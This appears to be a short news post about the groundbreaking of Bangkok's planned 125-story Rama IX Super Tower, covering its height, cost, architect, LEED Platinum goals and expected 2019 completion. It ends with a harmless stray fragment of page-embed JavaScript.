If all goes as planned, then Bangkok will soon be home to the third tallest building in the world. A leading Thai property developer Grand Canal Land Public Company (G Land) managed to recently break ground on the Rama IX Super Tower project. The project is a 125-story skyscraper measuring over 2,000 feet! Designed by Architects 49 Ltd., the $550 million LEED Platinum-seeking building will be developed as part of the city’s new central business district.
Known as the ‘Grand Rama 9’, it will become one of Bangkok’s most important economic hubs, smack in the heart of the capital. The mixed-use zone will boast premium office space and six-star hotel (with observation decks offering amazing panoramic views of Bangkok).
The project is further aiming for LEED platinum certification, rare in Thai hi-rise design. It will achieve this through an insulated cladded skin, solar panel array and bike-friendly infrastructure. Completion of the Super Tower is expected in 2019!d.getElementsByTagName(‘head’).appendChild(s);
